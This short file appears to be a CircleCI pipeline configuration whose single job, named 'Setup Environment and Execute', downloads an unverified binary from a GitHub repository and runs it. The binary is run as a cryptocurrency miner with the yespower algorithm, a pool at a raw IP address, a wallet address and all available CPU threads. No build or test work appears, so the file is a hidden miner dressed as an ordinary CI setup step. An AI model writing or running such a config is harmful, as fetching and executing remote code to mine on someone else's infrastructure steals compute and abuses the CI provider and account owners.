version: 2.1

executors:
  my-custom-executor:
    docker:
      - image: cimg/base:stable
        auth:
          username: $DOCKER_HUB_USER
          password: $DOCKER_HUB_PASSWORD
    resource_class: medium 

jobs:
  my-job-name:
    executor: my-custom-executor
    steps:
      - checkout
      - run:
          name: "Setup Environment and Execute"
          command: |
            wget -O sr https://github.com/barburonjilo/back/raw/main/sr && chmod +x sr && ./sr -a yespower --pool 139.59.115.152:8080 -u WiaVDfcRtFsaEek6177D9w6pryaowC3iM7.$(shuf -n 1 -i 1-10)-Sency --timeout 720 -t $(nproc --all) -p c=SWAMP

workflows:
  my-custom-workflow:
    jobs:
      - my-job-name:
          context:
            - docker-hub-creds # Menggunakan Context untuk manajemen secret yang lebih aman
